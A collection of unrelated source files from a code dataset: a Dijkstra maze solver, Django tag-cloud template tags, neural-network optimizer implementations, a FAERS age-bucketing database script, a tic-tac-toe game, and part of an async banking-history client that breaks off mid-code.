+{"seq_id":"179058484","text":"# -*- encoding: utf-8 -*-\nimport sys\nimport heapq\nr_input = sys.stdin.readline\n\nN, M = map(int, r_input().split()) # 미로의 크기\n\nmaze = {}\ncost = {}\n\ndx = [0, 1, -1, 0]\ndy = [1, 0, 0, -1]\n\nfor i in range(M):\n maze[i] = []\n\n for c in r_input().rstrip():\n maze[i].append(int(c))\n\n cost[i] = ['INF'] * N\n\ncost[0][0] = 0\n\nif M == 1:\n print(maze[0].count(1))\n exit()\n\nif N == 1:\n total = 0\n for i in range(M):\n total += maze[i][0]\n print(total)\n exit()\n\nqueue = []\n\nfor i in range(2):\n heapq.heappush(queue, (maze[dx[i]][dy[i]], dx[i], dy[i]))\n cost[dx[i]][dy[i]] = maze[dx[i]][dy[i]]\n\n\ndef dijkstra():\n while queue:\n mini = heapq.heappop(queue)\n min_cost = mini[0]\n min_x = mini[1]\n min_y = mini[2]\n\n for i in range(4):\n tmp_x = min_x + dx[i]\n tmp_y = min_y + dy[i]\n\n if 0 <= tmp_x < M and 0 <= tmp_y < N:\n tmp_cost = min_cost + maze[tmp_x][tmp_y]\n\n if cost[tmp_x][tmp_y] == 'INF' or tmp_cost < cost[tmp_x][tmp_y]:\n cost[tmp_x][tmp_y] = tmp_cost\n heapq.heappush(queue, (tmp_cost, tmp_x, tmp_y))\n\n\ndijkstra()\n\nprint(cost[M-1][N-1])\n","sub_path":"Algorithm/Baekjoon/01261 알고스팟/1261.py","file_name":"1261.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"381392636","text":"from django import template\nfrom django.db.models import Count\nfrom django.core.exceptions import FieldError\nfrom django.db.models.loading import get_model\n\nfrom templatetag_sugar.register import tag\nfrom templatetag_sugar.parser import Variable, Optional, Model, Required\n\nfrom taggit import VERSION as TAGGIT_VERSION\nfrom taggit_templatetags import settings\n\nT_MAX = getattr(settings, 'TAGCLOUD_MAX', 6.0)\nT_MIN = getattr(settings, 'TAGCLOUD_MIN', 1.0)\n\nregister = template.Library()\n\ndef get_queryset(forvar=None):\n count_field = None\n if forvar is None:\n # get all tags\n # tagged_things = settings.TAGGED_ITEM_MODEL.objects.all().distinct\n queryset = settings.TAG_MODEL.objects.all()\n else:\n # extract app label and model name\n beginning, applabel, model = None, None, None\n try:\n beginning, applabel, model = forvar.rsplit('.', 2)\n except ValueError:\n try:\n applabel, model = forvar.rsplit('.', 1)\n except ValueError:\n applabel = forvar\n applabel = applabel.lower()\n \n # filter tagged items \n if model is None:\n # Get tags for a whole app\n queryset = settings.TAGGED_ITEM_MODEL.objects.filter(content_type__app_label=applabel)\n tag_ids = queryset.values_list('tag_id', flat=True)\n queryset = settings.TAG_MODEL.objects.filter(id__in=tag_ids)\n else:\n # Get tags for a model\n model = model.lower()\n if \":\" in model:\n model, manager_attr = model.split(\":\", 1)\n else:\n manager_attr = \"tags\"\n model_class = get_model(applabel, model)\n manager = getattr(model_class, manager_attr)\n queryset = manager.all()\n through_opts = manager.through._meta\n count_field = (\"%s_%s_items\" % (through_opts.app_label,\n through_opts.object_name)).lower() #old style\n\n if count_field is None:\n # if \n relname = settings.TAGGED_ITEM_MODEL._meta.get_field_by_name('tag')[0].rel.related_name\n return queryset.annotate(num_times=Count(relname))\n else:\n return queryset.annotate(num_times=Count(count_field))\n\n\n\ndef get_weight_fun(t_min, t_max, f_min, f_max):\n def weight_fun(f_i, t_min=t_min, t_max=t_max, f_min=f_min, f_max=f_max):\n # Prevent a division by zero here, found to occur under some\n # pathological but nevertheless actually occurring circumstances.\n if f_max == f_min:\n mult_fac = 1.0\n else:\n mult_fac = float(t_max-t_min)/float(f_max-f_min)\n \n return t_max - (f_max-f_i)*mult_fac\n return weight_fun\n\n@tag(register, {Required('asvar'): Variable(), Optional('for_obj'): Variable(), Optional('count'): Variable()}) \ndef get_taglist(context, asvar, for_obj=None, count=None):\n # print asvar\n # print for_obj\n # print count\n queryset = get_queryset(for_obj) \n queryset = queryset.order_by('-num_times') \n if count:\n context[asvar] = queryset[:int(count)]\n else:\n context[asvar] = queryset\n \n return ''\n\n@tag(register, {Optional('as'): Variable(), Optional('for'): Variable(), Optional('count'): Variable()})\ndef get_tagcloud(context, asvar=None, forvar=None, count=None):\n queryset = get_queryset(forvar)\n num_times = queryset.values_list('num_times', flat=True)\n if(len(num_times) == 0):\n context[asvar] = queryset\n return ''\n weight_fun = get_weight_fun(T_MIN, T_MAX, min(num_times), max(num_times))\n if count:\n queryset = queryset.order_by('name')[:int(count)-1]\n else:\n queryset = queryset.order_by('name')\n for tag in queryset:\n tag.weight = weight_fun(tag.num_times)\n context[asvar] = queryset\n return ''\n \ndef include_tagcloud(forvar=None):\n return {'forvar': forvar}\n\ndef include_taglist(forvar=None):\n return 
{'forvar': forvar}\n \nregister.inclusion_tag('taggit_templatetags/taglist_include.html')(include_taglist)\nregister.inclusion_tag('taggit_templatetags/tagcloud_include.html')(include_tagcloud)\n","sub_path":"taggit_templatetags/templatetags/taggit_extras.py","file_name":"taggit_extras.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
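`get_weight_fun` in the record above is plain linear interpolation from tag frequencies in [f_min, f_max] onto font weights in [t_min, t_max]. Evaluating the closure at the endpoints shows the scaling:

```python
# Linear tag-cloud weighting, as in get_weight_fun() above.
def get_weight_fun(t_min, t_max, f_min, f_max):
    def weight_fun(f_i):
        if f_max == f_min:          # guard against division by zero
            mult_fac = 1.0
        else:
            mult_fac = float(t_max - t_min) / float(f_max - f_min)
        return t_max - (f_max - f_i) * mult_fac
    return weight_fun

w = get_weight_fun(1.0, 6.0, 2, 50)
print(w(2), w(50))   # 1.0 6.0: least/most used tags hit the configured bounds
```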
+{"seq_id":"228377250","text":"import os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# import local modules\nfrom coding_deep_neural_network_from_scratch import (initialize_parameters,\n L_model_forward,\n compute_cost,\n L_model_backward,\n update_parameters,\n accuracy)\n\n\ndef random_mini_batches(X, Y, mini_batch_size=64, seed=0):\n \"\"\"\n Creates a list of random minibatches from (X, Y)\n\n Arguments:\n X -- input data, shape: input size, number of examples\n Y -- \"label\" vector, shape: 1, number of examples\n mini_batch_size -- size of the mini-batches, integer\n\n Returns:\n mini_batches -- list of synchronous (mini_batch_X, mini_batch_Y)\n \"\"\"\n np.random.seed(seed)\n m = X.shape[1]\n mini_batches = []\n\n # shuffle training set\n permutation = np.random.permutation(m)\n shuffle_X = X[:, permutation]\n shuffle_Y = Y[:, permutation]\n\n num_complete_minibatches = m // mini_batch_size\n\n for k in range(num_complete_minibatches):\n mini_batch_X = shuffle_X[:, k*mini_batch_size:(k + 1)*mini_batch_size]\n mini_batch_Y = shuffle_Y[:, k*mini_batch_size:(k + 1)*mini_batch_size]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n\n # check if there are some examples left if m % batch_size != 0\n if m % mini_batch_size != 0:\n mini_batch_X = shuffle_X[:, num_complete_minibatches*mini_batch_size:]\n mini_batch_Y = shuffle_Y[:, num_complete_minibatches*mini_batch_size:]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n\n return mini_batches\n\n\ndef initialize_momentum(parameters):\n \"\"\"\n Initializes the velocity as a python dictionary with:\n - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\"\n - values: numpy arrays of zeros of the same shape as the\n corresponding gradients/parameters.\n\n Arguments:\n parameters -- python dictionary containing parameters.\n\n Returns:\n v -- python dictionary containing the current velocity.\n \"\"\"\n L = len(parameters) // 2\n v = {}\n\n for l in range(1, L + 1):\n v[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n v[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n\n return v\n\n\ndef update_parameters_with_momentum(parameters, grads, v, beta, learning_rate):\n \"\"\"\n Update parameters using Momentum\n\n Arguments:\n parameters -- python dictionary containing your parameters:\n grads -- python dictionary containing your gradients for each parameters:\n v -- python dictionary containing the current velocity:\n beta -- the momentum hyperparameter --> scalar\n learning_rate -- the learning rate --> scalar\n\n Returns:\n parameters -- python dictionary containing your updated parameters\n v -- python dictionary containing your updated velocities\n \"\"\"\n L = len(parameters) // 2\n\n for l in range(1, L + 1):\n # update momentum velocity\n v[\"dW\" + str(l)] =\\\n beta * v[\"dW\" + str(l)] + (1 - beta) * grads[\"dW\" + str(l)]\n v[\"db\" + str(l)] =\\\n beta * v[\"db\" + str(l)] + (1 - beta) * grads[\"db\" + str(l)]\n # update parameters\n parameters[\"W\" + str(l)] =\\\n parameters[\"W\" + str(l)] - learning_rate * v[\"dW\" + str(l)]\n parameters[\"b\" + str(l)] =\\\n parameters[\"b\" + str(l)] - learning_rate * v[\"db\" + str(l)]\n\n return parameters, v\n\n\ndef initialize_rmsprop(parameters):\n \"\"\"\n Initializes the velocity as a python dictionary with:\n - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\"\n - values: numpy arrays of zeros of the same shape as the\n corresponding gradients/parameters.\n\n Arguments:\n parameters -- python 
dictionary containing parameters.\n\n    Returns:\n    s -- python dictionary containing the exponentially weighted average\n         of the squared gradient.\n    \"\"\"\n    L = len(parameters) // 2\n    s = {}\n\n    for l in range(1, L + 1):\n        s[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n        s[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n\n    return s\n\n\ndef update_parameters_with_rmsprop(parameters, grads, s, beta, learning_rate,\n                                   epsilon=1e-8):\n    \"\"\"\n    Update parameters using RMSProp\n\n    Arguments:\n    parameters -- python dictionary containing parameters:\n    grads -- python dictionary containing gradients for each parameter:\n    s -- python dictionary containing the exponentially weighted average of\n         the squared gradient:\n    beta -- the RMSProp decay hyperparameter --> scalar\n    learning_rate -- the learning rate --> scalar\n    epsilon -- hyperparameter preventing division by zero in the updates\n\n    Returns:\n    parameters -- python dictionary containing your updated parameters\n    s -- python dictionary containing the updated squared-gradient averages\n    \"\"\"\n    L = len(parameters) // 2\n\n    for l in range(1, L + 1):\n        # update the moving average of the squared gradients\n        s[\"dW\" + str(l)] =\\\n            beta * s[\"dW\" + str(l)] +\\\n            (1 - beta) * np.square(grads[\"dW\" + str(l)])\n        s[\"db\" + str(l)] =\\\n            beta * s[\"db\" + str(l)] +\\\n            (1 - beta) * np.square(grads[\"db\" + str(l)])\n        # update parameters\n        parameters[\"W\" + str(l)] -= (learning_rate * grads[\"dW\" + str(l)])\\\n            / (np.sqrt(s[\"dW\" + str(l)]) + epsilon)\n        parameters[\"b\" + str(l)] -= (learning_rate * grads[\"db\" + str(l)])\\\n            / (np.sqrt(s[\"db\" + str(l)]) + epsilon)\n\n    return parameters, s\n\n\ndef initialize_adam(parameters):\n    \"\"\"\n    Initializes v and s as two python dictionaries with:\n    - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\"\n    - values: numpy arrays of zeros of the same shape as the\n      corresponding gradients/parameters.\n\n    Arguments:\n    parameters -- python dictionary containing your parameters.\n\n    Returns:\n    v -- python dictionary that will contain the exponentially weighted\n         average of the gradient.\n    s -- python dictionary that will contain the exponentially weighted\n         average of the squared gradient.\n    \"\"\"\n    L = len(parameters) // 2\n    v = {}\n    s = {}\n\n    for l in range(1, L + 1):\n        v[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n        v[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n        s[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n        s[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n\n    return v, s\n\n\ndef update_parameters_with_adam(parameters, grads, v, s, t, learning_rate,\n                                beta1=0.9, beta2=0.999, epsilon=1e-8):\n    \"\"\"\n    Update parameters using Adam\n\n    Arguments:\n    parameters -- python dictionary containing parameters:\n    grads -- python dictionary containing gradients for each parameter:\n    v -- Adam variable, moving average of the first gradient\n    s -- Adam variable, moving average of the squared gradient\n    t -- current update count, used for bias correction\n    learning_rate -- the learning rate, scalar.\n    beta1 -- Exponential decay hyperparameter for the first moment estimates\n    beta2 -- Exponential decay hyperparameter for the second moment estimates\n    epsilon -- hyperparameter preventing division by zero in Adam updates\n\n    Returns:\n    parameters -- python dictionary containing updated parameters\n    v -- Adam variable, moving average of the first gradient\n    s -- Adam variable, moving average of the squared gradient\n    \"\"\"\n    L = len(parameters) // 2\n    v_corrected = {}\n    s_corrected = {}\n\n    for l in range(1, L + 1):\n        # update the moving averages of both the gradient and the squared\n        # gradient\n        v[\"dW\" + str(l)] = beta1 * v[\"dW\" + str(l)] +\\\n            (1 - beta1) * grads[\"dW\" + str(l)]\n        v[\"db\" + str(l)] = beta1 * v[\"db\" + str(l)] +\\\n            (1 - beta1) * grads[\"db\" + str(l)]\n        s[\"dW\" + str(l)] = beta2 * s[\"dW\" + str(l)] +\\\n            (1 - beta2) * np.square(grads[\"dW\" + str(l)])\n        s[\"db\" + str(l)] = beta2 * s[\"db\" + str(l)] +\\\n            (1 - beta2) * np.square(grads[\"db\" + str(l)])\n\n        # compute the bias-corrected estimates of the moving averages\n        v_corrected[\"dW\" + str(l)] = v[\"dW\" + str(l)] / (1 - beta1**t)\n        v_corrected[\"db\" + str(l)] = v[\"db\" + str(l)] / (1 - beta1**t)\n        s_corrected[\"dW\" + str(l)] = s[\"dW\" + str(l)] / (1 - beta2**t)\n        s_corrected[\"db\" + str(l)] = s[\"db\" + str(l)] / (1 - beta2**t)\n\n        # update parameters\n        parameters[\"W\" + str(l)] -= (\n            learning_rate * v_corrected[\"dW\" + str(l)])\\\n            / (np.sqrt(s_corrected[\"dW\" + str(l)]) + epsilon)\n        parameters[\"b\" + str(l)] -= (\n            learning_rate * v_corrected[\"db\" + str(l)])\\\n            / (np.sqrt(s_corrected[\"db\" + str(l)]) + epsilon)\n\n    return parameters, v, s\n\n\ndef model(X, Y, layers_dims, optimizer=\"adam\", learning_rate=0.01,\n          mini_batch_size=64, beta=0.9, beta1=0.9, beta2=0.999, epsilon=1e-8,\n          num_epochs=3000, print_cost=True, activation_fn=\"relu\"):\n    \"\"\"\n    Implements an L-layer neural network model that can be run with\n    different optimizers.\n\n    Arguments:\n    X -- input data, shape: number of features, number of examples\n    Y -- label vector, shape: 1, number of examples\n    layers_dims -- python list, containing the size of each layer\n    optimizer -- \"mb\", \"momentum\", \"rmsprop\", or \"adam\".\n    learning_rate -- the learning rate --> scalar.\n    mini_batch_size -- the size of a mini batch\n    beta -- Momentum/RMSProp hyperparameter\n    beta1 -- Exponential decay hyperparameter for the past gradients\n    beta2 -- Exponential decay hyperparameter for the past squared gradients\n    epsilon -- hyperparameter preventing division by zero\n    num_epochs -- number of epochs\n    print_cost -- True to print the cost every 100 epochs\n    activation_fn -- function to be used on hidden layers: \"relu\", or \"tanh\"\n\n    Returns:\n    parameters -- python dictionary containing updated parameters\n    \"\"\"\n    # set random seed to get consistent output\n    seed = 1\n    np.random.seed(seed)\n\n    # initialize parameters\n    parameters = initialize_parameters(layers_dims)\n\n    # initialize moving averages based on the optimizer mode\n    assert optimizer in (\"mb\", \"momentum\", \"rmsprop\", \"adam\")\n\n    if optimizer == \"momentum\":\n        v = initialize_momentum(parameters)\n\n    elif optimizer == \"rmsprop\":\n        s = initialize_rmsprop(parameters)\n\n    elif optimizer == \"adam\":\n        v, s = initialize_adam(parameters)\n        t = 0\n\n    # initialize costs list\n    costs = []\n\n    # iterate over number of epochs\n    for epoch in range(num_epochs):\n        # split the training data into mini batches\n        seed += 1\n        mini_batches = random_mini_batches(X, Y, mini_batch_size, seed=seed)\n\n        # iterate over mini batches\n        for mini_batch in mini_batches:\n            mini_batch_X, mini_batch_Y = mini_batch\n\n            # compute fwd prop\n            AL, caches = L_model_forward(\n                mini_batch_X, parameters, activation_fn)\n\n            # compute cost\n            cost = compute_cost(AL, mini_batch_Y)\n\n            # compute gradients\n            grads = L_model_backward(AL, mini_batch_Y, caches, activation_fn)\n\n            # update parameters\n            if optimizer == \"mb\":\n                parameters = update_parameters(\n                    parameters, grads, learning_rate)\n\n            elif optimizer == \"momentum\":\n                parameters, v = update_parameters_with_momentum(\n                    parameters, grads, v, beta, learning_rate)\n\n            elif optimizer == \"rmsprop\":\n                parameters, s = update_parameters_with_rmsprop(\n                    parameters, grads, s, beta, learning_rate, epsilon)\n\n            elif optimizer == \"adam\":\n                t += 1\n                parameters, v, s = update_parameters_with_adam(\n                    parameters, grads, v, s, t, learning_rate, beta1, beta2,\n                    epsilon)\n\n        # compute epoch cost on the full training set\n        AL, caches = L_model_forward(X, parameters, activation_fn)\n        cost = compute_cost(AL, Y)\n\n        if epoch % 100 == 0:\n            costs.append(cost)\n            if print_cost:\n                print(\"Cost after epoch {0}: {1}\".format(epoch, cost))\n\n    # plot the cost\n    plt.plot(costs)\n    plt.ylabel('Cost')\n    plt.xlabel('Epochs (per hundreds)')\n    plt.title(\"Learning rate = \" + str(learning_rate))\n    plt.show()\n\n    return parameters\n","sub_path":"scripts/optimization_algorithms.py","file_name":"optimization_algorithms.py","file_ext":"py","file_size_in_byte":12598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
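A quick way to see why the bias correction in update_parameters_with_adam matters: for a constant gradient g, the uncorrected moving average equals (1 - beta1**t) * g, so it starts near zero, while dividing by (1 - beta1**t) recovers g exactly. A minimal standalone sketch (scalar values only, no numpy needed):

# Bias correction of an exponentially weighted average for a constant
# gradient g = 1.0. The raw average v underestimates g early on; the
# corrected value v / (1 - beta1**t) equals g at every step.
beta1 = 0.9
g = 1.0
v = 0.0
for t in range(1, 6):
    v = beta1 * v + (1 - beta1) * g
    print(t, round(v, 4), round(v / (1 - beta1 ** t), 4))
# t=1 -> v=0.1, corrected=1.0 ; t=5 -> v=0.4095, corrected=1.0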
+{"seq_id":"301797535","text":"# -*- coding:utf-8 -*-\n# 計算DEMO中的AGE_TYPE並寫入資料庫\nimport time\nimport pyodbc\n\ndb_name = \"FAERS\"\n\nselect_age = \"SELECT PRIMARYID, AGE, AGE_COD FROM {0};\"\nget_columns = \"SELECT Name FROM SysColumns WHERE id=Object_Id('{0}')\"\nadd_type_column = \"ALTER TABLE {0} ADD AGE_TYPE tinyint;\"\nupdate_age_type = \"UPDATE {0} SET AGE_TYPE = {1} WHERE PRIMARYID = {2}\"\n\n\ndef get_age_type(age_data):\n \"\"\"輸入AGE跟AGE_COD,計算AGE_TYPE\n \"\"\"\n age, age_cod = age_data\n if age == None or age_cod == None:\n return None\n # 單位從小到大,例如輸入AGE_COD是秒SEX,則會先被轉成分鐘MIN,最後會變成年YR\n if age_cod == \"SEC\":\n age/=60\n age_cod=\"MIN\"\n if age_cod == \"MIN\":\n age/=60\n age_cod=\"HR\"\n if age_cod == \"HR\":\n age/=24\n age_cod=\"DY\"\n if age_cod == \"DY\":\n age/=7\n age_cod=\"WK\"\n if age_cod == \"WK\":\n age/=4\n age_cod=\"MON\"\n if age_cod == \"MON\":\n age/=12\n age_cod=\"YR\"\n if age_cod == \"DEC\":\n age*=10\n age_cod=\"YR\"\n if age_cod != \"YR\":\n return None\n # 年齡離散化規則參考網站上整理的表格\n if age < 0: # 0代表有資料但是不合理\n return 0\n if age < 1 :#Infant, Newborn\n return 1\n if age < 2 :#Infant\n return 2\n if age < 5 :#Child Preschool\n return 3\n if age < 12:#Child\n return 4\n if age < 18:#Adolescent\n return 5\n if age < 24:#Young Adult\n return 6\n if age < 44:#Adult\n return 7\n if age < 64:#Middle Aged\n return 8\n if age < 79:#Aged\n return 9\n if age < 123:#Aged+\n return 10\n return 0\n\ndef set_db_age_type(quarter):\n \"\"\"一次處理一季,在DEMO加入AGE_TYPE欄位,並依AGE和AGE_COD算出。\n \"\"\"\n data = {}\n with pyodbc.connect(\"driver={SQL Server};server=localhost;Trusted_Connection=yes\", database=db_name) as con:\n with con.cursor() as cursor:\n row = cursor.execute(select_age.format(quarter))\n for pid, age, age_type in row: # 先把該季年齡值與單位取出\n try:\n data[pid] = (float(age), age_type.strip())\n except:\n continue\n print(\"{0} >> {1} records\".format(quarter, len(data)))\n # 如果表內沒有 AGE_TYPE 欄位要先新增\n columns = [c for c, in cursor.execute(get_columns.format(quarter))]\n if \"AGE_TYPE\" not in columns:\n cursor.execute(add_type_column.format(quarter))\n # 設定AGE_TYPE\n for pid in data:\n age_type = get_age_type(data[pid])\n if age_type: # 有回傳值\n cursor.execute(update_age_type.format(quarter, age_type, pid))\n else:\n cursor.execute(update_age_type.format(quarter, \"NULL\", pid))\n cursor.commit()\n\ndef main():\n with pyodbc.connect(\"driver={SQL Server};server=localhost;Trusted_Connection=yes\", database=db_name) as con:\n with con.cursor() as cursor:\n tables = [t for t, in cursor.execute(\"SELECT TABLE_NAME FROM INFORMATION_SCHEMA.Tables;\") if \"DEMO\" in t]\n tables.sort()\n for quarter in tables:\n set_db_age_type(quarter)\n\nif __name__ == \"__main__\":\n print(time.asctime(time.localtime(time.time())))\n main()\n print(time.asctime(time.localtime(time.time())))\n","sub_path":"scripts/set_age_type.py","file_name":"set_age_type.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"522350149","text":"class Board_game():\n def __init__(self):\n self.wins_coord = [(1, 2, 3), (4, 5, 6,), (7, 8, 9), (1, 4, 7), (2, 5, 8), (3, 6, 9), (1, 5, 9), (3, 5, 7)]\n self.board = list(range(1, 10))\n\n\n def draf_board(self):\n\n print('-------------')\n for i in range(3):\n print('|', self.board[0 + i * 3], '|', self.board[1 + i * 3], '|', self.board[2 + i * 3], '|')\n print('-------------')\n\n\n\n def take_input(self,playar_token):\n while True:\n value = input('Куда поставить: '+playar_token + '?')\n if not (value in '123456789'):\n print('Ошибочный вывод.Повторите.')\n continue\n value = int(value)\n if str(self.board[value - 1]) in 'xo':\n print('Эта клетка уже занята')\n continue\n self.board[value - 1] = playar_token\n break\n\n def chek_win(self):\n\n for each in self.wins_coord:\n if (self.board[each[0] - 1]) == (self.board[each[1] - 1]) == (self.board[each[2] - 1]):\n return self.board[each[1] - 1]\n else:\n return False\n\n\n def main(self):\n\n counter = 0\n while True:\n self.draf_board()\n if counter % 2 == 0:\n self.take_input('x')\n else:\n self.take_input('o')\n if counter > 3:\n winner = self.chek_win()\n if winner:\n self.draf_board()\n print(winner, \"выиграл!\")\n break\n counter += 1\n if counter > 8:\n self.draf_board()\n print('Ничья!')\n break\n\ng = Board_game()\ng.main()","sub_path":"крестики-нолики1.py","file_name":"крестики-нолики1.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"174463185","text":"\"\"\"\r\nMIT License\r\n\r\nCopyright (c) 2021 Ali Fayaz (Quill) (quillfires)\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n\"\"\"\r\nimport asyncio\r\nfrom asyncio import ensure_future, Future, iscoroutine\r\nfrom collections import defaultdict, OrderedDict\r\nfrom threading import Lock\r\nfrom .core.http import HTTPSession\r\nfrom .core.errors import *\r\n\r\n\r\nclass asyncBML():\r\n def __init__(self, *, loop=None, username=None, password=None):\r\n loop = loop or asyncio.get_event_loop()\r\n self.http = HTTPSession(loop=loop, username=username, password=password)\r\n self._events = defaultdict(OrderedDict)\r\n self.transactions = []\r\n self._loop = loop\r\n self._lock = Lock()\r\n\r\n async def close(self):\r\n \"\"\"|coro|\r\n Clear the session\r\n\r\n \"\"\"\r\n await self.http.close()\r\n\r\n async def get_accounts(self):\r\n \"\"\"|coro|\r\n\r\n Method which retrieves all the accounts.\r\n\r\n Returns\r\n ---------\r\n list: accounts\r\n a list of disctionary objects containing all the accounts.\r\n [{account1}, {account2}, {account3}]\r\n \"\"\"\r\n data = await self.http.get_all_accounts()\r\n return data\r\n\r\n def event(self, event, f=None):\r\n \"\"\"Registers the function ``f`` to the event name ``event``.\r\n If ``f`` isn't provided, this method returns a function that\r\n takes ``f`` as a callback; in other words, you can use this method\r\n as a decorator, like so:\r\n @bank.event('new_transaction')\r\n async def data_handler(data):\r\n print(data)\r\n In both the decorated and undecorated forms, the event handler is\r\n returned. 
The upshot of this is that you can call decorated handlers\r\n directly\r\n\r\n Note\r\n --------\r\n Will fire all the transactions within 24 hrs at the app reboot.\r\n Use a db to make sure that you arnt notified of the same transaction.\r\n \"\"\"\r\n def _on(f):\r\n self._add_event_handler(event, f, f)\r\n return f\r\n if f is None:\r\n return _on\r\n else:\r\n return _on(f)\r\n\r\n def _add_event_handler(self, event, k, v):\r\n self.emit('new_listener', event, k)\r\n with self._lock:\r\n self._events[event][k] = v\r\n\r\n def _emit_handle_potential_error(self, event, error):\r\n if event == 'error':\r\n if error:\r\n raise error\r\n else:\r\n raise ClientError(\"Uncaught, unspecified 'error' event.\")\r\n\r\n def _call_handlers(self, event, args, kwargs):\r\n handled = False\r\n with self._lock:\r\n funcs = list(self._events[event].values())\r\n for f in funcs:\r\n self._emit_run(f, args, kwargs)\r\n handled = True\r\n return handled\r\n\r\n def emit(self, event, *args, **kwargs):\r\n handled = self._call_handlers(event, args, kwargs)\r\n if not handled:\r\n self._emit_handle_potential_error(event, args[0] if args else None)\r\n return handled\r\n\r\n def _emit_run(self, f, args, kwargs):\r\n try:\r\n coro = f(*args, **kwargs)\r\n except Exception as exc:\r\n self.emit('error', exc)\r\n else:\r\n if iscoroutine(coro):\r\n if self._loop:\r\n f = ensure_future(coro, loop=self._loop)\r\n else:\r\n f = ensure_future(coro)\r\n elif isinstance(coro, Future):\r\n f = coro\r\n else:\r\n f = None\r\n\r\n if f:\r\n @f.add_done_callback\r\n def _callback(f):\r\n if f.cancelled():\r\n return\r\n\r\n exc = f.exception()\r\n if exc:\r\n self.emit('error', exc)\r\n\r\n async def get_contacts(self):\r\n \"\"\"|coro|\r\n\r\n Method which retrieves all the contacts.\r\n\r\n Returns\r\n ---------\r\n list: contacts\r\n a list of disctionary objects containing all the details for each contacts.\r\n [{contact1}, {contact2}, {contact3}]\r\n\r\n Raises\r\n --------\r\n ClientError\r\n Bad request while fetching contacts.\r\n HTTPException\r\n Failed to login.\r\n \"\"\"\r\n data = await self.http.get_contacts()\r\n return data\r\n \r\n async def add_contact(self, name=None, account=None):\r\n \"\"\"|coro|\r\n\r\n Method to add a contact.\r\n\r\n Returns\r\n ---------\r\n dict: contact\r\n a dictionary object of the added contact\r\n {contact}\r\n\r\n Raises\r\n --------\r\n MissingRequiredFields\r\n Missing a required field (account number or name).\r\n InvalidContent\r\n Invalid account number.\r\n ClientError\r\n Bad request while fetching contacts.\r\n HTTPException\r\n Failed to login.\r\n DuplicateContent\r\n Account number is already saved in your contacts.\r\n Along with the error message it will print \r\n the name of the duplicate.\r\n \"\"\"\r\n data = await self.http.add_contact(name, account)\r\n return data\r\n\r\n async def delete_contact(self, account=None):\r\n \"\"\"|coro|\r\n\r\n Method to delete a contact.\r\n\r\n Returns\r\n ---------\r\n str: notice\r\n 'Contact removed successfully'\r\n\r\n Raises\r\n --------\r\n MissingRequiredFields\r\n Missing the contact details (account number or name or id).\r\n InvalidContent\r\n Contact is not found in your list of contacts.\r\n ClientError\r\n Bad request while deleting contact.\r\n HTTPException\r\n Failed to login.\r\n \"\"\"\r\n data = await self.http.delete_contact(account)\r\n return data\r\n\r\n async def get_history(self) -> dict:\r\n \"\"\"|coro|\r\n\r\n Method which retrieves the account history.\r\n\r\n Returns\r\n ---------\r\n 
dict: transactions\r\n Dictionary object containing transactions relating to each account.\r\n {account1:{[{transaction1},{transaction2}]},account2:{[{transaction1},{transaction2}]},}\r\n\r\n transaction:\r\n {'date': 'date', 'sender': 'sender', 'amount': 'amount', 'minus': True/False, 'balance': 'uncleared amount', \r\n 'description': 'Type of transaction'}\r\n\r\n Raises\r\n --------\r\n HTTPException\r\n Bad request while fetching transactions.\r\n \"\"\"\r\n data = await self.http.get_history()\r\n return data\r\n\r\n async def start(self):\r\n \"\"\"|coro|\r\n An asynchronous call which starts the BML event loop.\r\n listen for new transactions using a decorator like:\r\n @aiobmlclient.event('new_transaction')\r\n async def data_handler(data):\r\n print(data)\r\n\r\n Note\r\n --------\r\n Will fire all the transactions within last 24hrs at the app reboot.\r\n Use a db to make sure that you arnt notified of the same transaction.\r\n \"\"\"\r\n while True:\r\n mybank = await self.http.get_history()\r\n if mybank:\r\n for accounts in mybank:\r\n for transaction in mybank[accounts]:\r\n transaction.pop('balance')\r\n if (transaction not in self.transactions):\r\n 